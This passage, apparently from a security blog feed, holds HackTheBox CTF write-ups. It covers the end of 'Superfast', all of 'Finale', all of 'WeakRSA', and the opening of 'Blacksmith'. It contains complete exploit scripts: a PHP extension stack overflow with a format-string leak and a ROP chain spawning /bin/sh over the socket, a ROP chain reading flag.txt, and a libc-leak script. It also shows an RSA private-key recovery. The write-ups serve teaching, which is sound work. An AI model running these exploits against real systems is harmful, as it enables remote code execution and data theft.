That means that sizeof(buffer) - size > 0) is always true, unless sizeof(buffer) == size. The result of that is a buffer overflow on the stack which we can leverage for a control flow hijacking primitive. Using Ghidra - the reverse engineering suite developed by the NSA - we can see that the offset from the buffer to the return address on the stack is 0x98 (152) bytes.

Stack variable offsets in Ghidra

However, ASLR is enabled. That means we cannot guess the library's memory address, and hence cannot guess an absolute return address for control-flow hijacking. However, the lowest 12 bits of an address are not randomized, so we can reliably overwrite those 12 bits of the return address. Say our normal return address is 0x555555559a1e; in the next run of the program it could be 0x55555123fa1e, but the 0xa1e at the end doesn't change, because those are the lowest 12 bits.

The reason the lowest 12 bits of the address don't change is that they form the offset within a 4096-byte (2**12) page, and the kernel - the manager of ASLR - randomizes mappings at page granularity. The offset within the page therefore stays constant across runs.

Sadly, we can only write in units of 8 bits (1 byte) at a time, since we're working with a char buffer. This means we can only overwrite the 0x1e part of the addresses listed above, which narrows our possible return-address range.

In Ghidra, we can figure out that the return address from decrypt() back into log_cmd() (without ASLR) equals 0x101429, as the listing below shows. This means our range of possible return addresses spans 0x101400 to 0x1014ff.

      0010141e 48 89 ce     MOV       param_2,RCX
      00101421 48 89 c7     MOV       param_1,RAX
      00101424 e8 07 fc     CALL      decrypt
               ff ff
      00101429 48 89 44     MOV       qword ptr [RSP + local_10],RAX
               24 38
      0010142e 48 83 7c     CMP       qword ptr [RSP + local_10],0x0
               24 38 00

The code in our return range is shown below. We can see that decrypt() is called, print_message() is called, and a handful of file-I/O functions follow. Internally, print_message() is a wrapper for php_printf(), the printf() implementation in PHP. This is interesting because its output ends up in the HTTP response body, which means we can leak pointers.

    *(undefined4 *)(param_2 + 8) = 1;
  }
  else {
    iVar1 = decrypt(local_20,local_28,(size_t *)(local_30 & 0xff),local_28,(size_t)inlen);
    local_10 = CONCAT44(extraout_var,iVar1);
    if (local_10 == 0) {
      print_message("Invalid input provided\n");
    }
    else {
      local_18 = fopen("/tmp/log","a");
      fwrite((void *)(local_10 + 0x18),*(size_t *)(local_10 + 0x10),1,local_18);
      fclose(local_18);
    }
    *(undefined4 *)(param_2 + 8) = 1;
  }
  return;
}

C decompilation of our return scope 

However, in order to leak pointers with print_message(), we need to set the RDI register to the printf format string. Fortunately, the RDI register is set to the input argument of decrypt(char* buf, size_t size, uint8_t key) at 0x101390.

      00101385 48 8b 84     MOV       RAX,qword ptr [RSP + local_18]
               24 a0 00 
               00 00
      0010138d 48 89 c6     MOV       inputlen,RAX
      00101390 48 89 cf     MOV       input,param_4
      00101393 e8 e8 fc     CALL      <EXTERNAL>::memcpy
               ff ff
      00101398 48 8b 54     MOV       key,qword ptr [RSP + local_58]
               24 60

Assembly code which moves the input into the RDI register

When I try to fuzz using a script, I receive the following output:

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@\x81\xd5\x84U\x80~

Fuzzing output

from pwn import xor
import requests

xorkey = 1

s = requests.session()
headers = {"cmd-key": str(xorkey)}

# offset = 152 
payload = b"A"*152 + b"\x40"
content = s.get(b"http://127.0.0.1:1337?cmd="+payload, headers=headers).content
print(xor(content, xorkey))

Script used to fuzz

However, when we remove the xor() function call, we can see that the end of the response is an address like b'A\x80\xd4\x85T\x81\x7f'. Using print(hex(u64(content[63:].ljust(8, b'\x00')))) we can translate it to 0x7f815485d48041. In order to identify where this leak happens, we can start a GDB server. We leak the address 0x7f651305f54041 and in GDB we can see with vmmap (in pwndbg) that this falls under 0x7f6513000000 0x7f6513200000 rw-p 200000 0 [anon_7f6513000]. Since this isn't executable it's irrelevant for the ROP chain.

from pwn import xor, gdb, u64
import requests
import time

gdb.debug(args=['php', '-t', './pwn_superfast/challenge', '-dextension=./pwn_superfast/challenge/php_logger.so', '-S', '0.0.0.0:1337'], gdbscript='continue')
time.sleep(5)

xorkey = 1

s = requests.session()
headers = {"cmd-key": str(xorkey)}

payload = b"A"*152 + b"\x40"
content = s.get(b"http://127.0.0.1:1337?cmd="+payload, headers=headers).content
print(hex(u64(content[63:].ljust(8, b'\x00'))))

time.sleep(999)

Script for debugging using GDB

Since that leak is useless, we need another way to leak addresses. To do that, we can exploit the fact that we're calling printf() with a string we control: by supplying a payload like %08x %08x %08x %08x we can dump values from the stack. Through trial and error, I found that we can leak the stack, php_logger.so, and the PHP binary using the format string %llx_%llx_%llx_%llx_%llx_%llx_%llx_%llx_%llx_. With the payload below, we get the following leaks:

php @ 0x55c720a64000
php_logger.so @ 0x7f609866e000
stack @ 0x7fff10fbd480

Output of the script

#!/usr/bin/env python3

from pwn import xor, u64, gdb
import requests
import time

gdb.debug(args=['php', '-t', './pwn_superfast/challenge', '-dextension=./pwn_superfast/challenge/php_logger.so', '-S', '0.0.0.0:1337'], gdbscript='continue')

time.sleep(3)

xorkey = 0x4
s = requests.session()
headers = {"cmd-key": str(xorkey)}

fmt = b'%llx_%llx_%llx_%llx_%llx_%llx_%llx_%llx_%llx_'
payload = xor(fmt + b"A"*(152 - len(fmt)), xorkey) + b"\x40"
url = b"http://127.1:1337/index.php?cmd=" + payload
print(url)

content = s.get(url, headers=headers).content
addresses = content.split(b"_")

php_base = int(addresses[5], 16)-0x55e240
logger_base = int(addresses[8], 16)-0x1445
stack = int(addresses[0], 16)

print("php @", hex(php_base))
print("php_logger.so @", hex(logger_base))
print("stack @", hex(stack))

time.sleep(999)

Payload for leaking addresses

We have the needed primitives, so we can develop the ROP chain.

Developing the ROP chain

Now we can use pwntools' ROP and ELF classes to build the ROP chain automatically. Using the ELF class, we can see that the execl function is present in the PLT of the php binary, which means we can use it to spawn a shell. Our strategy is:

  1. Leaking the address of the PHP binary and the php_logger.so in memory.
  2. dup2(4, N) to set stdin, stdout and stderr file descriptors to the TCP connection file descriptor for the webserver.
  3. execl("/bin/sh", "/bin/sh", 0) to spawn the /bin/sh executable

We can generate a ROP chain automatically with pwntools:

rop = ROP(php)

'''
fd[0]      tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
fd[1]      tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
fd[2]      tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
fd[3]      tcp 0.0.0.0:1337 => 0.0.0.0:0 (listen)
fd[4]      tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
'''

# set connection socket to stdin/stdout/stderr
rop.call('dup2', [4, 0])
rop.call('dup2', [4, 1])
rop.call('dup2', [4, 2])

binsh = next(php.search(b"/bin/sh\x00"))

rop.call('execl', [binsh, binsh, 0])
print(rop.dump())

Python code for generating the ROP chain

Which gives the following ROP chain:

0x0000:   0x56244b60816b pop rdi; ret
0x0008:              0x4 [arg0] rdi = 4
0x0010:   0x56244b6043fc pop rsi; ret
0x0018:              0x0 [arg1] rsi = 0
0x0020:   0x56244b601be0 dup2
0x0028:   0x56244b60816b pop rdi; ret
0x0030:              0x4 [arg0] rdi = 4
0x0038:   0x56244b6043fc pop rsi; ret
0x0040:              0x1 [arg1] rsi = 1
0x0048:   0x56244b601be0 dup2
0x0050:   0x56244b60816b pop rdi; ret
0x0058:              0x4 [arg0] rdi = 4
0x0060:   0x56244b6043fc pop rsi; ret
0x0068:              0x2 [arg1] rsi = 2
0x0070:   0x56244b601be0 dup2
0x0078:   0x56244b60816b pop rdi; ret
0x0080:   0x56244bd03fc3 [arg0] rdi = 94713890750403
0x0088:   0x56244b60487c pop rdx; ret
0x0090:              0x0 [arg2] rdx = 0
0x0098:   0x56244b6043fc pop rsi; ret
0x00a0:   0x56244bd03fc3 [arg1] rsi = 94713890750403
0x00a8:   0x56244b6042d0 execl

ROP chain generated by pwntools

As we can see, it does the following:

dup2(4, 0)
dup2(4, 1)
dup2(4, 2)
execl("/bin/sh", "/bin/sh", 0)

C representation of the ROP chain

Retrieving the flag

I coded the following script to utilize the ROP chain. If we run this, we get a shell on the box.

#!/usr/bin/env python3

from pwn import xor, u64, gdb, ELF, p64, remote, ROP, context
import requests
import time
import urllib

#gdb.debug(args=['/usr/bin/php', '-t', './pwn_superfast/challenge', '-dextension=./pwn_superfast/challenge/php_logger.so', '-S', '0.0.0.0:1337'], gdbscript='continue')
#time.sleep(5)

target_ip = b"161.35.173.232"
target_port = b"31302"

target_host = b"http://" + target_ip + b":" + target_port

s = requests.session()
headers = {"cmd-key": "1"}

fmt = b'%llx_%llx_%llx_%llx_%llx_%llx_%llx_%llx_%llx_'
payload = xor(fmt + b"A"*(152 - len(fmt)), 1) + b"\x40"

print("[*] sending payload...")
content = s.get(target_host + b"/index.php?cmd=" + payload, headers=headers).content
addresses = content.split(b"_")

print("[*] loading addresses...")
# set context for ROP()
#context.binary = php = ELF('/usr/bin/php', checksec=False)
context.binary = php = ELF('./php', checksec=False)
php.address = int(addresses[5], 16) - php.sym.executor_globals

php_logger = ELF('pwn_superfast/challenge/php_logger.so', checksec=False)
php_logger.address = int(addresses[8], 16)-0x1445
stack = int(addresses[0], 16)

print("[+] php @", hex(php.address))
print("[+] php_logger.so @", hex(php_logger.address))
print("[+] stack @", hex(stack))

rop = ROP(php)

'''
fd[0]      tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
fd[1]      tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
fd[2]      tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
fd[3]      tcp 0.0.0.0:1337 => 0.0.0.0:0 (listen)
fd[4]      tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
'''

# set connection socket to stdin/stdout/stderr
rop.call('dup2', [4, 0])
rop.call('dup2', [4, 1])
rop.call('dup2', [4, 2])

binsh = next(php.search(b"/bin/sh\x00"))

rop.call('execl', [binsh, binsh, 0])
print(rop.dump())

payload = b'A'*152 + rop.chain()
http = "GET /index.php?cmd=" + urllib.parse.quote(payload) + " HTTP/1.1\n"
http += "Cmd-Key: 1\n\n"

print("[*] sending payload for shell...")
p = remote(target_ip, int(target_port))
p.send(http.encode())
p.interactive()

time.sleep(999)

Python script for retrieving the flag

$ python3 script.py
[*] sending payload...
[*] loading addresses...
[+] php @ 0x55da3ce00000
[+] php_logger.so @ 0x7fb906c50000
[+] stack @ 0x7ffee56eddc0
[*] Loaded 327 cached gadgets for './php'
0x0000:   0x55da3d00816b pop rdi; ret
0x0008:              0x4 [arg0] rdi = 4
0x0010:   0x55da3d0043fc pop rsi; ret
0x0018:              0x0 [arg1] rsi = 0
0x0020:   0x55da3d001be0 dup2
0x0028:   0x55da3d00816b pop rdi; ret
0x0030:              0x4 [arg0] rdi = 4
0x0038:   0x55da3d0043fc pop rsi; ret
0x0040:              0x1 [arg1] rsi = 1
0x0048:   0x55da3d001be0 dup2
0x0050:   0x55da3d00816b pop rdi; ret
0x0058:              0x4 [arg0] rdi = 4
0x0060:   0x55da3d0043fc pop rsi; ret
0x0068:              0x2 [arg1] rsi = 2
0x0070:   0x55da3d001be0 dup2
0x0078:   0x55da3d00816b pop rdi; ret
0x0080:   0x55da3d703fc3 [arg0] rdi = 94395821998019
0x0088:   0x55da3d00487c pop rdx; ret
0x0090:              0x0 [arg2] rdx = 0
0x0098:   0x55da3d0043fc pop rsi; ret
0x00a0:   0x55da3d703fc3 [arg1] rsi = 94395821998019
0x00a8:   0x55da3d0042d0 execl
[*] sending payload for shell...
[+] Opening connection to b'161.35.173.232' on port 31302: Done
[*] Switching to interactive mode
sh: turning off NDELAY mode
$ whoami
ctf

Output of the exploit

Thanks for reading my write-up about the HackTheBox Business CTF 2022 Superfast challenge; I hope you learned as much as I did.

]]>
<![CDATA[Finale (HackTheBox)]]>Hey all. Today we're going to discuss the retired Finale challenge on HackTheBox. The description on HackTheBox is as follows:

It's the end of the season and we all know that the Spooktober Spirit will grant a souvenir to everyone and make their wish come true!
]]>
https://pwning.tech/finale/658f44f8d32e980001de21e9Sat, 26 Nov 2022 18:27:03 GMTHey all. Today we're going to discuss the retired Finale challenge on HackTheBox. The description on HackTheBox is as follows:

It's the end of the season and we all know that the Spooktober Spirit will grant a souvenir to everyone and make their wish come true! Wish you the best for the upcoming year!

In this write-up, we will learn about the stack, ROP chains, and prioritizing attack vectors.

Spoiler alert: if you can't find the libc version, it's not a bug.

Summary

  • First looks
  • Finding vulnerability primitives
  • Developing the ROP chain
  • Retrieving the flag
  • Failed attempt

First looks

We are given an executable binary called finale. Upon running it, we are prompted for a password, which means we'll need to do some static analysis in order to proceed.

[Strange man in mask screams some nonsense]: iut2rxgf

[Strange man in mask]: In order to proceed, tell us the secret phrase: <...>

[Strange man in mask]: Sorry, you are not allowed to enter here!
The dynamic analysis

Running pwntools' checksec on finale gives us:

$ checksec finale
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
Checksec output

The fields mean:

  • Arch: the CPU architecture and instruction set (x86, ARM, MIPS, ...)
  • RELRO: Relocation Read-Only - secures the dynamic linking process
  • Stack Canaries: protects against stack buffer overflow attacks
  • NX: No eXecute - write-able memory cannot be executed
  • PIE: Position Independent Executable - address randomization

For a more in-depth explanation of checksec, please visit our previous blogpost about the Blacksmith challenge on Hack The Box. The logical conclusion is that we need to perform a stack-based buffer overflow (since stack canaries are disabled) leading to a Return-Oriented Programming chain (since NX is enabled).

Finding vulnerability primitives

To start, a vulnerability primitive is a building block of an exploit. A primitive can be bundled with other primitives to achieve a higher impact.

Main() analysis

In order to analyze the binary, I opened it up in Ghidra, made by the NSA. The main() function prints 8 random bytes, asks us for a secret and calls finale().

long main()
{
  int iVar1;
  char secret [16];
  char rand [8];
  ulong i;
  
  banner();
  rand = 0;
  iVar1 = open("/dev/urandom",0);
  read(iVar1,rand,8);
  printf("\n[Strange man in mask screams some nonsense]: %s\n\n",rand);
  close(iVar1);
  secret._0_8_ = 0;
  secret._8_8_ = 0;
  printf("[Strange man in mask]: In order to proceed, tell us the secret phrase: ");
  __isoc99_scanf("%16s",secret);
  i = 0;
  do {
    if (i > 14) {
LAB_CHECK_SECRET:
      iVar1 = strncmp(secret,"s34s0nf1n4l3b00",15);
      if (iVar1 == 0) {
        finale();
      } else {
        printf("%s\n[Strange man in mask]: Sorry, you are not allowed to enter here!\n\n","\x1b[1;31m");
      }
      return;
    }
    if (secret[i] == '\n') {
      secret[i] = '\0';
      goto LAB_CHECK_SECRET;
    }
    i++;
  } while( true );
}

Main function

As we can see, the secret for the binary is s34s0nf1n4l3b00 and finale() gets called after the correct secret has been entered.

Finale() analysis

As said, main() calls finale() after the secret has been entered. This function asks us for a wish for the next year.

void finale()
{
  char buf[64];
  
  printf("\n[Strange man in mask]: Season finale is here! Take this souvenir with you for good luck: [%p]",buf);
  printf("\n\n[Strange man in mask]: Now, tell us a wish for next year: ");
  fflush(stdin);
  fflush(stdout);
  read(0,buf,0x1000);
  write(1,"\n[Strange man in mask]: That\'s a nice wish! Let the Spooktober Spirit be with you!\n\n",0x54);
  return;
}
Finale function

We are given a stack leak in the form of char* buf. Furthermore, there is a stack buffer overflow: the buffer length is 64 bytes while we write up to 0x1000 (4096) bytes. In Ghidra we can see that the offset from the base of buf to the return address is 0x48 bytes.
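The 0x48 offset is easy to double-check by hand, assuming the layout Ghidra shows (no extra locals or padding between buf and the saved frame pointer):

```python
# Stack layout of finale(): 64 bytes of buf, then the saved RBP,
# then the return address we want to overwrite.
buf_size = 0x40           # char buf[64]
saved_rbp = 8             # 8-byte saved frame pointer on x86-64
offset_to_retaddr = buf_size + saved_rbp
print(hex(offset_to_retaddr))  # 0x48
```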

GOT

Considering checksec said No PIE (0x400000), we can use the Procedure Linkage Table (PLT) section of the binary. This means we could open a potential flag.txt using open(), read() and write().

Developing the ROP chain

Considering the protections in the binary listed by checksec state that No eXecute is enabled, we need to use Return Oriented Programming (ROP) chains. We want to do the following in the payload:

fd = open("flag.txt", 0);
n_read = read(3, buf, size);  // 3 since fd == 3 can be expected
write(1, buf, n_read);
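The "fd == 3 can be expected" assumption can be sanity-checked locally (a standalone snippet, not part of the exploit): the kernel hands out the lowest free descriptor, and a process that only has stdin/stdout/stderr (0-2) open will typically get 3 from its first open().

```python
import os
import tempfile

# Create a file to open; close the temp fd so it doesn't occupy a slot.
fd0, path = tempfile.mkstemp()
os.write(fd0, b"flag{test}")
os.close(fd0)

fd = os.open(path, os.O_RDONLY)   # lowest unused descriptor, typically 3
data = os.read(fd, 64)
print(fd, data)
os.close(fd)
os.remove(path)
```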

We have access to:

  • Binary/ELF
      • GOT and PLT (linked functions)
      • Functions (built-in functions)
  • Stack

Using print(*ELF('challenge/finale').plt.keys()), we can see that the following functions are available in the PLT sections:

strncmp puts write printf alarm
close read srand time fflush
setvbuf open __isoc99_scanf rand
Available functions in the PLT section

Now that we have the right functions and access to the stack (for "flag.txt"), we need a way to pass function arguments. The x64 calling convention states that function arguments are passed (in order) via RDI, RSI, RDX, RCX, R8, R9. This means that we need to control the RDI, RSI, and RDX registers via pop instructions (called gadgets) in the ROP chain in order to pass 3 arguments to open(), read(), and write(). We can search for such gadgets using ropr: a blazing fast multithreaded ROP gadget finder. Below is my search regex filter for ropr:

$ ropr -R '^pop (rdi|rsi|rdx); ret;' challenge/finale  
0x004012d6: pop rdi; ret;
0x004012d8: pop rsi; ret;

Sadly, ropr can't find any gadgets for the RDX register. Even after trying many more search queries (like EDX and DX), I couldn't find any results. This means that we need to find a workaround for a high-enough RDX value for read(..., ..., size=RDX).

GNU Debugger (GDB)

In order to find out a way to get a high RDX value, I used GDB with the Pwndbg plug-in (please say /pwn-dbg/ and not /poʊndbæg/ as the repo proposes). To see the RDX value during runtime, we can use the GDB functions in pwntools:

#!/usr/bin/env python3

from pwn import ELF, remote, gdb, p64, u64
import time

e = ELF('challenge/finale')
p = e.process()

# 0x004012d6: pop rdi; ret;
pop_rdi = p64(0x4012d6)

# 0x004012d8: pop rsi; ret;
pop_rsi = p64(0x4012d8)

def leak_func(address):
    payload = b'A'*0x48
    payload += pop_rdi + p64(address) + p64(e.plt.puts) + p64(e.sym.finale)

    p.sendafter(b"next year: ", payload)
    p.recvuntil(b"you!\n\n")  # clear buffer
    return u64(p.recvuntil(b"\n")[:-1].ljust(8, b'\x00'))


p.sendlineafter(b"secret phrase: ", b"s34s0nf1n4l3b00")
p.recvuntil(b"good luck: [")  # clear buffer for next address read

leak = int(p.recvuntil(b"]")[:-1], 16)
print("leak @", hex(leak))

file = b'flag.txt\0'
rbp = leak + 0x170

payload = file + b'A'*(0x40-len(file)) + p64(rbp)
payload += pop_rdi + p64(leak)
payload += pop_rsi + p64(0)
payload += p64(0x4014c7)

gdb.attach(p, 'b *0x4014c7\ncontinue')
p.sendafter(b"next year: ", payload)

while True:
    print(p.recv())
Payload for opening GDB at the open() call
0x00000000004014e0 in main ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]────────────────────
 RAX  0x3
 RBX  0x0
 RCX  0x7ffc887475a0 —▸ 0x7f76d739e2e0 ◂— 0x0
 RDX  0x8
*RDI  0x3
 RSI  0x7ffc887475a0 —▸ 0x7f76d739e2e0 ◂— 0x0
 R8   0x3c
 R9   0x7ffc887451bc ◂— 0x3c00007f76
 R10  0x0
 R11  0x246
 R12  0x7ffc887475f8 —▸ 0x7ffc88748289 ◂— '~/Documents/ctf/htb/finale/challenge/finale'
 R13  0x401492 (main) ◂— endbr64 
 R14  0x403d70 (__do_global_dtors_aux_fini_array_entry) —▸ 0x4012a0 (__do_global_dtors_aux) ◂— endbr64 
 R15  0x7f76d739d040 (_rtld_global) —▸ 0x7f76d739e2e0 ◂— 0x0
 RBP  0x7ffc887475c0 —▸ 0x7ffc887475f0 ◂— 0x1
 RSP  0x7ffc887474c0 ◂— 0xe193b4642436643b
*RIP  0x4014e0 (main+78) ◂— call 0x401170
─────────────────────────────[ DISASM / x86-64 / set emulate on ]─────────────────────────────
   0x4014cf <main+61>     lea    rcx, [rbp - 0x20]
   0x4014d3 <main+65>     mov    eax, dword ptr [rbp - 0xc]
   0x4014d6 <main+68>     mov    edx, 8
   0x4014db <main+73>     mov    rsi, rcx
   0x4014de <main+76>     mov    edi, eax
 ► 0x4014e0 <main+78>     call   read@plt                      <read@plt>
        fd: 0x3 (~/Documents/ctf/htb/finale/flag.txt)
        buf: 0x7ffc887475a0 —▸ 0x7f76d739e2e0 ◂— 0x0
        nbytes: 0x8
 
   0x4014e5 <main+83>     lea    rax, [rbp - 0x20]
   0x4014e9 <main+87>     mov    rsi, rax
   0x4014ec <main+90>     lea    rax, [rip + 0x1425]
   0x4014f3 <main+97>     mov    rdi, rax
   0x4014f6 <main+100>    mov    eax, 0
GDB breakpoint dump

As we can see, RDX is equal to 8 which means only 8 bytes of the flag get read and written to stdout. Since we need to read at least 32 bytes, we need to find a way of manipulating the RDX register. We could do this by:

  • Calling open("flag.txt", 0) using the PLT section in the ELF (which only executes the function and immediately returns after)
  • Manipulating RDX
  • Calling 0x4014e0 so we read() with the manipulated RDX and write() to stdout all at once.

As said, I tried finding gadgets which sadly did not work. After manually analyzing the binary I happened to see the following gadget:

      00401476 ba 54 00     MOV       EDX,0x54
               00 00
      0040147b 48 8d 05     LEA       RAX,[s__[Strange_man_in_mask]:_That's_a_ = "\n[Strange man in mask]: 
               2e 14 00 
               00
      00401482 48 89 c6     MOV       RSI=>s__[Strange_man_in_mask]:_That's_a_ = "\n[Strange man in mask]: 
      00401485 bf 01 00     MOV       EDI,0x1
               00 00
      0040148a e8 a1 fc     CALL      <EXTERNAL>::write                         ssize_t write(int __fd, void
               ff ff
      0040148f 90            NOP
      00401490 c9            LEAVE
      00401491 c3            RET
Part of the finale() function

As we can see, the EDX register is set to 0x54. This means we will read and write 84 bytes of the flag, which is more than enough, and completes the final part of the ROP chain:

  • open@PLT("flag.txt", 0)
  • finale() // to set RDX to 0x54
  • Set RDI to 3
  • Set RSI to the buffer buf
  • JMP 0x4014e0 // read() -> write()

A.k.a.:

file = b'flag.txt\0'
rbp = leak - 0x5000

payload = file + b'A'*(0x40-len(file)) + p64(rbp)
payload += pop_rdi + p64(leak)
payload += pop_rsi + p64(0)
payload += p64(e.plt.open)
payload += p64(e.sym.finale)  # set RDX

p.sendafter(b"next year: ", payload)

payload = file + b'A'*(0x40-len(file)) + p64(rbp)
payload += pop_rdi + p64(3)
payload += pop_rsi + p64(rbp-0x20)
payload += p64(0x4014e0)  # read() -> write()

p.sendafter(b"next year: ", payload)
The Python representation of the ROP chain

Retrieving the flag

So, the grand finale of the script is:

#!/usr/bin/env python3

from pwn import ELF, remote, gdb, p64, u64
import time

e = ELF('challenge/finale')
is_remote = False
if is_remote:
    p = remote("167.99.204.5", 31431)
else:
    p = e.process()

# 0x004012d6: pop rdi; ret;
pop_rdi = p64(0x4012d6)

# 0x004012d8: pop rsi; ret;
pop_rsi = p64(0x4012d8)

def leak_func(address):
    payload = b'A'*0x48
    payload += pop_rdi + p64(address) + p64(e.plt.puts) + p64(e.sym.finale)

    p.sendafter(b"next year: ", payload)
    p.recvuntil(b"you!\n\n")  # clear buffer
    return u64(p.recvuntil(b"\n")[:-1].ljust(8, b'\x00'))


p.sendlineafter(b"secret phrase: ", b"s34s0nf1n4l3b00")
p.recvuntil(b"good luck: [")  # clear buffer for next address read

leak = int(p.recvuntil(b"]")[:-1], 16)
print("leak @", hex(leak))

file = b'flag.txt\0'
rbp = leak - 0x5000

payload = file + b'A'*(0x40-len(file)) + p64(rbp)
payload += pop_rdi + p64(leak)
payload += pop_rsi + p64(0)
payload += p64(e.plt.open)
payload += p64(e.sym.finale)  # set RDX

p.sendafter(b"next year: ", payload)

payload = file + b'A'*(0x40-len(file)) + p64(rbp)
payload += pop_rdi + p64(3)
payload += pop_rsi + p64(rbp-0x20)
payload += p64(0x4014e0)  # read() -> write()

p.sendafter(b"next year: ", payload)
while True:
    print(p.recv())

Failed attempt

In my failed attempt I tried to get remote code execution using leaked libc offsets, but it turned out that the libc version on the server was custom and it was intended to prevent this solution. I had to find out by asking the creator of the challenge.

The way we leak libc addresses is by calling puts() in the PLT section with the argument being a libc function linked in the GOT section. So, we need to call puts(const char *string); with argument string via the RDI register in AMD64. To control the RDI register, we use a ROP chain that pops RDI:

$ ropr -R 'pop rdi; ret;' challenge/finale
0x004012d6: pop rdi; ret;

==> Found 1 gadgets in 0.004 seconds

Now we can pop a GOT function address into RDI and call puts() to leak the function offset. Let's run the following script with the server as target to get their libc version:

#!/usr/bin/env python3

from pwn import ELF, remote, gdb, p64, u64
import time

e = ELF('challenge/finale')
is_remote = False
if is_remote: 
    p = remote("161.35.173.232", 31394)
else:
    p = e.process()

# 0x004012d6: pop rdi; ret;
pop_rdi = p64(0x004012d6)

def leak_func(address):
    payload = b'A'*0x48
    payload += pop_rdi + p64(address) + p64(e.plt.puts) + p64(e.sym.finale)
    
    p.sendafter(b"next year: ", payload)
    p.recvuntil(b"you!\n\n")  # clear buffer
    return u64(p.recvuntil(b"\n")[:-1].ljust(8, b'\x00'))

p.sendlineafter(b"secret phrase: ", b"s34s0nf1n4l3b00")
p.recvuntil(b"good luck: [")  # clear buffer for next address read

leak = int(p.recvuntil(b"]")[:-1], 16)
print("leak @", hex(leak))

#gdb.attach(p)
for name, addr in e.got.items():
    print(name, "@", hex(leak_func(addr)))
The payload for leaking LIBC addresses

The output is the following:

__libc_start_main @ 0x7ff2d7c29dc0
__gmon_start__ @ 0x0
stdout @ 0x7ff2d7e1a780
stdin @ 0x7ff2d7e19aa0
strncmp @ 0x0
puts @ 0x7ff2d7c80ed0
write @ 0x7ff2d7d14a20
printf @ 0x7ff2d7c60770
alarm @ 0x7ff2d7cea5b0
close @ 0x0
read @ 0x7ff2d7d14980
srand @ 0x7ff2d7c460a0
time @ 0x7ffdaafcfc60
fflush @ 0x7ff2d7c7f1b0
setvbuf @ 0x7ff2d7c81670
open @ 0x7ff2d7d14690
__isoc99_scanf @ 0x7ff2d7c62110
rand @ 0x7ff2d7c46760

When I enter those symbols and addresses into a libc database like libc.rip, I cannot find a single matching libc version. That means the server uses a custom libc build, which means we can't call system() since we don't have its address.

]]>
<![CDATA[WeakRSA (HackTheBox)]]>G'day everyone! In this write-up we are going to solve the retired WeakRSA challenge on Hack The Box. In order to do so however it is important you understand some of the basics. You will learn

  • Basic RSA
  • Decoding pem formats

How does RSA work?

RSA is an

]]>
https://pwning.tech/weakrsa/658f44f8d32e980001de21ebThu, 24 Nov 2022 21:27:26 GMTG'day everyone! In this write-up we are going to solve the retired WeakRSA challenge on Hack The Box. In order to do so, however, it is important that you understand some of the basics. You will learn:

  • Basic RSA
  • Decoding pem formats

How does RSA work?

RSA is an encryption algorithm which has been around since 1977. To use it, you need to choose two different large prime numbers; these will be named p and q.

By multiplying p and q together you get your modulus, named N. Then you choose your exponent, which we will name e. Now you are ready to encrypt your secret message. Using RSA, the encrypted message is calculated like this: (message^e) mod N

In Python 3 it can be computed like this:

pow(message,e,N)

Decrypting RSA

Decrypting is a little bit harder. To do so, we first must find phi, φ(N). We can do so like this: φ(N) = (p-1) * (q-1).

Remember that we need to know p and q to decrypt; this is important. We are finally ready to calculate d, the modular inverse of e modulo φ(N). This can be done by using the extended Euclidean algorithm. You don't have to understand how (or why) it works, but saying it will make you look smart. In Python I use xgcd from the libnum library; d will be the first value the algorithm outputs.

d = xgcd(e, φN)[0]

The plaintext can then be calculated:

plaintext = pow(encrypted, d, N)
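Putting the formulas above together, here is a toy round trip with the classic textbook primes 61 and 53 (a sketch only; real keys use primes hundreds of digits long). Python's three-argument pow() computes the modular inverse directly, which yields the same d as the libnum xgcd route from the text:

```python
# Toy RSA round trip: keygen, encrypt, decrypt.
p, q = 61, 53
N = p * q                  # modulus: 3233
e = 17                     # public exponent
phi = (p - 1) * (q - 1)    # 3120
d = pow(e, -1, phi)        # modular inverse of e (Python 3.8+)

message = 42
encrypted = pow(message, e, N)   # (message^e) mod N
plaintext = pow(encrypted, d, N) # (encrypted^d) mod N
print(plaintext)  # 42
```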

Solving the challenge

After downloading and extracting the zip, we get a key encoded in the .pub format. We can decode it using Python or an online tool, which gives us the following data:

The modulus is the public key N, and the public exponent is our e

We know that the modulus is just p * q, but it would take forever to factor such a large number. If only there were a quicker method. Wait a minute: what if there are databases containing the factors of large numbers... That would be really helpful. After some searching I encountered this site. Let's try to input our N:

Looks like we found p and q. From here we can get the flag using Python:
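A minimal sketch of such a recovery script; the challenge's actual p, q, e and ciphertext come from the decoded key and the factor database and are omitted here, so toy Mersenne primes and the marker b"HTB" stand in to keep the snippet runnable:

```python
def recover(p, q, e, ciphertext):
    # Rebuild the private key from the recovered factors and decrypt.
    N = p * q
    phi = (p - 1) * (q - 1)
    d = pow(e, -1, phi)            # modular inverse of e
    m = pow(ciphertext, d, N)      # plaintext as an integer
    return m.to_bytes((m.bit_length() + 7) // 8, "big")  # int -> flag bytes

# Toy demonstration with Mersenne primes 2^127-1 and 2^89-1:
p, q, e = 2**127 - 1, 2**89 - 1, 65537
c = pow(int.from_bytes(b"HTB", "big"), e, p * q)
flag = recover(p, q, e, c)
print(flag)  # b'HTB'
```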

The script should output the flag :

HTB{s1mpl3_Wi3n3rs_4tt4ck}

The lesson this challenge is trying to teach us is that p and q should be sufficiently large (at least 512 bits each, and preferably more). This way the public key is far less likely to appear in factorization databases, so p and q can't be found and your secret messages won't be able to be decrypted.

]]>
<![CDATA[Blacksmith (HackTheBox)]]>Hey all. Today we're going to discuss the retired Blacksmith challenge on HackTheBox. The description on HackTheBox is as follows:

You are the only one who is capable of saving this town and bringing peace upon this land! You found a blacksmith who can create the most powerful
]]>
https://pwning.tech/blacksmith/658f44f8d32e980001de21e8Sun, 20 Nov 2022 12:00:00 GMTHey all. Today we're going to discuss the retired Blacksmith challenge on HackTheBox. The description on HackTheBox is as follows:

